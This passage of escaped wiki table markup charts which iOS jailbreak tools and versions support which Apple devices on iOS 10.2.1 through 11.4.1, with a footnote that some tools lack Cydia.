|-&lt;br /&gt;
| beta 7&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;9&amp;quot; | 10.2.1&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC5-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;9&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Meridian]]&lt;br /&gt;
| pb1-pb6&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 0.9 - 0.9-007&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | [[Saïgon]]&lt;br /&gt;
| beta 1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Partial&amp;lt;ref group=&amp;quot;10.x&amp;quot; name=&amp;quot;saigon5,1&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}  &lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 2 revision 1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| beta 3&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 10.3&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC1-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[g0blin]]&lt;br /&gt;
| RC0-RC2&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Meridian]]&lt;br /&gt;
| pb1 - 0.9-007&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 10.3.1&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC1-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[g0blin]]&lt;br /&gt;
| RC0-RC2&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Meridian]]&lt;br /&gt;
| pb1 - 0.9-007&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 10.3.2&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC1-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[g0blin]]&lt;br /&gt;
| RC0-RC2&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Meridian]]&lt;br /&gt;
| pb1 - 0.9-007&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 10.3.3&lt;br /&gt;
| [[doubleH3lix]]&lt;br /&gt;
| RC1-RC8&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[g0blin]]&lt;br /&gt;
| RC0-RC2&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC1-RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Meridian]]&lt;br /&gt;
| pb1 - 0.9-007&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[TotallyNotSpyware]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 10.3.4&lt;br /&gt;
| [[h3lix]]&lt;br /&gt;
| RC6&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{n/a}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;references group=&amp;quot;10.x&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;saigon5,1&amp;quot;&amp;gt;[[J81AP|iPad Air 2 (Wi-Fi)]] only&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====11.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;23&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad Air]]&lt;br /&gt;
! [[iPad Air 2]]&lt;br /&gt;
! [[iPad Pro (12.9-inch)]]&lt;br /&gt;
! [[iPad Pro (9.7-inch)]]&lt;br /&gt;
! [[iPad (5th generation)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch) (2nd generation)]]&lt;br /&gt;
! [[iPad Pro (10.5-inch)]]&lt;br /&gt;
! [[iPad (6th generation)]]&lt;br /&gt;
! [[iPad mini 2]]&lt;br /&gt;
! [[iPad mini 3]]&lt;br /&gt;
! [[iPad mini 4]]&lt;br /&gt;
! [[iPhone 5s]]&lt;br /&gt;
! [[N61AP|iPhone 6]]&lt;br /&gt;
! [[N56AP|iPhone 6 Plus]]&lt;br /&gt;
! [[iPhone 6s]]&lt;br /&gt;
! [[iPhone 6s Plus]]&lt;br /&gt;
! [[iPhone SE (1st generation)]]&lt;br /&gt;
! [[iPhone 7]]&lt;br /&gt;
! [[iPhone 7 Plus]]&lt;br /&gt;
! [[iPhone 8]]&lt;br /&gt;
! [[iPhone 8 Plus]]&lt;br /&gt;
! [[iPhone X]]&lt;br /&gt;
! [[N102AP|iPod touch (6th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Electra|Electra1112]]&lt;br /&gt;
| Beta 1-Beta 11-3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberiOS]]&lt;br /&gt;
| 11.0-11.0.3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.0.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Electra|Electra1112]]&lt;br /&gt;
| Beta 1-Beta 11-3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberiOS]]&lt;br /&gt;
| 11.0-11.0.3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.0.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Electra|Electra1112]]&lt;br /&gt;
| Beta 1-Beta 11-3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberiOS]]&lt;br /&gt;
| 11.0-11.0.3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.0.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Electra|Electra1112]]&lt;br /&gt;
| Beta 1-Beta 11-3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberiOS]]&lt;br /&gt;
| 11.0-11.0.3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Electra|Electra1112]]&lt;br /&gt;
| Beta 1-Beta 11-3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberiOS]]&lt;br /&gt;
| 11.0-11.0.3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.1.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Electra|Electra1112]]&lt;br /&gt;
| Beta 1-Beta 11-3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberiOS]]&lt;br /&gt;
| 11.0-11.0.3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 11.1.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Electra|Electra1112]]&lt;br /&gt;
| Beta 1-Beta 11-3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
|-&lt;br /&gt;
| [[LiberiOS]]&lt;br /&gt;
| 11.0-11.0.3&amp;lt;ref group=&amp;quot;11.x_i&amp;quot; name=&amp;quot;no-cydia&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2.1&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2.2&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2.5&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.2.6&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;7&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.3&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;23&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.3.1&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;23&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| Any&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.4&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.2.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;23&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 11.4.1&lt;br /&gt;
| [[Electra|Electra1141]]&lt;br /&gt;
| 1.2.0 onwards&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;23&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;11.x_i&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;no-cydia&amp;quot;&amp;gt;There is no [[Cydia]] included with this jailbreak, making it useless to the average jailbreaker.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====12.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
